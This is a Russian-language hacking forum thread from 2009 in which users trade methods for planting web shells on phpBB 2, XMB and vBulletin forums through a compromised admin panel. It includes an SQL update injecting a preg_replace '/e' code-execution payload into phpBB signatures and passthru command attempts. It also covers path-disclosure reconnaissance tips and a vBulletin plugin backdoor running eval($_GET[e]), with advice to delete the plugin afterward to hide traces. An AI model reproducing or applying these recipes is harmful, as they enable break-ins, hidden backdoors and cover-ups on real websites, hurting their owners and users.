28.04.2009, 16:31
|
|
Познающий
Регистрация: 21.11.2004
Сообщений: 59
С нами:
11298184
Репутация:
1
|
|
имея информацию настроек и тд, что можно с ней делать?
|
|
|
24.06.2009, 19:06
|
|
Новичок
Регистрация: 05.04.2008
Сообщений: 7
С нами:
9525635
Репутация:
1
|
|
Пытаюсь залить шелл на phpbb 2.0.21. Делаю апдейт бд через админку такого рода:
Код:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2;
phpinfo() выводит без проблем, а так же любую команду через eval или passthru, но только состоящую из одного слова, так как не принимает кавычки. Тоесть, passthru(ls) работает, а passthru(ls -la) уже естествено нет. Пробовал обойти эту херню всякими бэк-слэшами, не помогает...
Может кто знает как это можно обойти? Может через char() или hex как это делается в мускл?
// Все нашол!
Последний раз редактировалось GettoLove; 25.06.2009 в 19:14..
|
|
|
|
22.07.2009, 00:21
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
С нами:
9561436
Репутация:
462
|
|
Как в XMB из админки залить?
|
|
|
|
07.08.2009, 00:46
|
|
Новичок
Регистрация: 11.04.2009
Сообщений: 25
С нами:
8991827
Репутация:
28
|
|
Подскажите, залил шелл в phpBB 2й версии, вообщем лазаю там, хотел отредить индекс, а оказалось что там стоит тип на всех файлах только для чтения видать, ибо нечего не могу отредить :/, вопрос, можно ли это как нить убрать? шелл с57
|
|
|
|
07.08.2009, 01:14
|
|
Постоянный
Регистрация: 08.02.2009
Сообщений: 345
С нами:
9081587
Репутация:
306
|
|
установить права доступа
|
|
|
|
07.08.2009, 10:09
|
|
Новичок
Регистрация: 11.04.2009
Сообщений: 25
С нами:
8991827
Репутация:
28
|
|
как именно? ) если можно то по конкретнее )
|
|
|
|
22.08.2009, 11:06
|
|
Новичок
Регистрация: 11.04.2009
Сообщений: 25
С нами:
8991827
Репутация:
28
|
|
Подскажите как залить шелл в пхп2 ? доступ в админку есть, проблема в том что не моуг узнать полный путь к папке форума поэтому 1й пост не какит, узнать не могу ибо почему то профили вообще не работают -_-
|
|
|
|
22.08.2009, 11:11
|
|
Banned
Регистрация: 15.08.2009
Сообщений: 12
С нами:
8810322
Репутация:
28
|
|
Сообщение от Jo[K]eR
Подскажите как залить шелл в пхп2 ? доступ в админку есть, проблема в том что не моуг узнать полный путь к папке форума поэтому 1й пост не какит, узнать не могу ибо почему то профили вообще не работают -_-
узнать путь не особая проблема:
1. поюзай гугл inurl:site.com "error"
2. просканируй сайт на дириктории (часто бывают случаи что открыты дирриктории в которых лежат php скрипты, которые при примом открытии выдают ошибку синтаксическу ну и раскрытие)
3. потыкай скрипты что кроме форумного движка стоят (если есть)
4. реверс айпи, тыкаешь другие сайты на поиск раскрытия путей (часто случается что путь выглядет /usr/home/domain.com/htdocs/; /usr/home/domain2.com/htdocs/)
включи мозги
|
|
|
|
26.08.2009, 11:24
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
С нами:
9230381
Репутация:
90
|
|
Как залить шелл в vBulletin 3.8.1? Линки в первом посту нерабочие.
|
|
|
|
26.08.2009, 15:13
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Код:
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: faq_complete
Код: eval($_GET[e]);
потом шлепаем на http://site.ru/forum/faq.php?e=phpinfo();
льем шелл, возвращаемся в админку, удаляем модуль faq_complete |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для Jo[K]eR](/avatars/avatar82337.jpg?1434438){kind=avatar}
![Аватар для Jo[K]eR](/avatars/avatar82337.jpg?1434890){kind=avatar}
![Аватар для Jo[K]eR](/avatars/avatar82337.jpg?1471380){kind=avatar}
Похожие темы
Комбинированный вид
